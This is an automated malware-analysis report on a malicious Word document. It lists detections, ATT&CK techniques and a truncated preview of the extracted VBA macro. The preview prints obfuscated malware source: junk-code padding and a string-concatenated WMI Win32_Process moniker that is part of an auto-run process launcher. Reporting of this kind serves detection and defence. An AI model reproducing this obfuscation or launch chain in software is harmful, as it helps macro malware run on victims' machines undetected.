MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing a VBA macro. The macro utilizes GetObject and CreateObject to interact with WMI's Win32_Process, indicating an intent to launch an external process. This is a common technique for downloading and executing further malicious payloads. The presence of an AutoOpen macro further suggests automatic execution upon opening.
Heuristics 8
-
ClamAV: Doc.Malware.Dpzn-6865673-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Dpzn-6865673-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 59207 bytes |
SHA-256: 808abd70df5a2d2cc6bbdc8dba18a1994ffa71d6fa7895369c1befa34ef4e105 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "w_87_0_8"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "E960__63"
Function u7_5_927()
Select Case j07206__
Case 975216751
D81482_ = Log(v5686254)
Q706125_ = CDate(446989759)
R11067 = Fix(635876912 + 854830414 + j27_54__ - Oct(597285366))
h1_263_ = Cos(175701281 - Sqr(186174107 - Atn(322986415)) - 372282598 + 458561127)
End Select
Select Case w2_20423
Case 643565131
F9_3__ = Log(n_32_5)
m4_488_7 = CDate(64065962)
t_5_3_76 = Fix(917251719 + 356412451 + u4471_1 - Oct(165890029))
Z5__398_ = Cos(402701496 - Sqr(139121659 - Atn(296917423)) - 974108805 + 444159491)
End Select
Select Case G4_4_07
Case 477866322
Y3__45_2 = Log(w1__0757)
m969____ = CDate(462911845)
b___777 = Fix(519126395 + 966973158 + p3725398 - Oct(390929165))
c2__22 = Cos(426342374 - Sqr(496619113 - Atn(137654344)) - 671226216 + 819692882)
End Select
Select Case K8_5_4__
Case 428023403
C3820_7 = Log(i56889_)
f140_66 = CDate(581924392)
m23_78 = Fix(76452604 + 920176803 + i43866_ - Oct(97920145))
M7_5__56 = Cos(219720391 - Sqr(155325006 - Atn(660415928)) - 77729273 + 458107732)
End Select
Select Case J887__
Case 582949130
V2_47069 = Log(t0_3713)
R5_111_ = CDate(907427881)
Q__342 = Fix(809444727 + 591856692 + S5298_9 - Oct(427554554))
Y94288 = Cos(439947078 - Sqr(113179380 - Atn(719920942)) - 217229393 + 490626696)
End Select
Select Case A__1_2
Case 258010107
j6357_3 = Log(C722_6_)
K0_2_993 = CDate(504326168)
c_054_ = Fix(567317348 + 931962928 + s___23 - Oct(218245170))
Z4_615 = Cos(594432519 - Sqr(593301028 - Atn(666350328)) - 584348566 + 739162024)
End Select
Select Case Z75___
Case 130046545
Z16302 = Log(N64_5798)
f70_83 = CDate(100528990)
r089_961 = Fix(972481152 + 251598096 + c340__23 - Oct(3293372))
F_8488 = Cos(452878507 - Sqr(226932724 - Atn(88722026)) - 188527265 + 187069840)
End Select
End Function
Function q__1287_(L65__396, q_2___2)
On Error Resume Next
Select Case i__8__
Case 475856830
H26_91_ = Log(l_38_8_)
X9__01 = CDate(98084144)
h134924 = Fix(619110488 + 538984467 + w_38__7 - Oct(977279984))
W_2012 = Cos(722210165 - Sqr(376323707 - Atn(426060720)) - 371781237 + 618616982)
End Select
Select Case C_04_68
Case 652085704
Z3699_10 = Log(W99_78)
m_802_73 = CDate(507806577)
q9_694 = Fix(270671216 + 739858407 + t6400_ - Oct(473375770))
p53__53_ = Cos(61477646 - Sqr(444705859 - Atn(132925130)) - 445981725 + 483467435)
End Select
Select Case b0_2182
Case 412858554
h8_366 = Log(w7_16_)
Q09_896 = CDate(177102161)
u47_57_ = Fix(163262357 + 651083909 + u0_0_6 - Oct(738859350))
R_2936_ = Cos(833127237 - Sqr(519588308 - Atn(51165207)) - 128472470 + 663790913)
End Select
B_96910 = L47614 + "winmgmts:Win32" + "_ProcessStartup" + j74875
Select Case L_3_464
Case 95387040
v8_5_4 = Log(P93_248)
G526_2 = CDate(288282167)
w50_8__ = Fix(523667146 + 956761767 + P7__94 - Oct(842166200))
o_4343_ = Cos(175902975 - Sqr(809985513 - Atn(144350844)) - 391552779 + 639754283)
End Select
Select Case h3_474
Case 916853637
S_73088 = Log(s083766_)
u8_03_ = CDate(741879786)
X_9_351 = Fix(346886232 + 152885670 + z1014_9 - Oct(492362795))
q8____ = Cos(63
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.